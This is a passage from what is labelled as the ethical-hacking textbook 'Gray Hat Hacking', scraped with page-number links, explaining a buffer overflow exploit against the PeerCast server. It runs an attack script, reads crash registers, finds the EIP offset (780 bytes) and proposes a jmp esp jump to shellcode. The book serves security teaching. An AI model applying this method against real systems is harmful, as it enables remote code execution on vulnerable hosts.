10.10.151 7144
Be sure to remove all hard carriage returns from the ends of each line. Make the
peercast.sh file executable, within your metasploit cygwin shell:
$ chmod 755 ../peercast.sh
Execute the peercast attack script.
$ ../peercast.sh
Gray Hat Hacking: The Ethical Hacker??™s Handbook
166
As expected, when we run the attack script, our server crashes.
The debugger breaks with the eip set to 0x42306142 and esp is set to 0x61423161.
Using Metasploit??™s patternOffset.pl tool, we can determine where in the pattern we
overwrote eip and esp.
Determine the Attack Vector
As can be seen in the last step, when the program crashed, the overwritten esp value was
exactly 4 bytes after the overwritten eip. Therefore, if we fill the attack buffer with
780 bytes of junk and then place 4 bytes to overwrite eip, we can then place our shellcode
at this point and have access to it in esp when the program crashes, because the value of
esp matches the value of our buffer at exactly 4 bytes after eip (784). Each exploit is different,
but in this case, all we have to do is find an assembly opcode that says ???jmp esp???. If we
place the address of that opcode after 780 bytes of junk, the program will continue
executing that opcode when it crashes.
Pages:
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341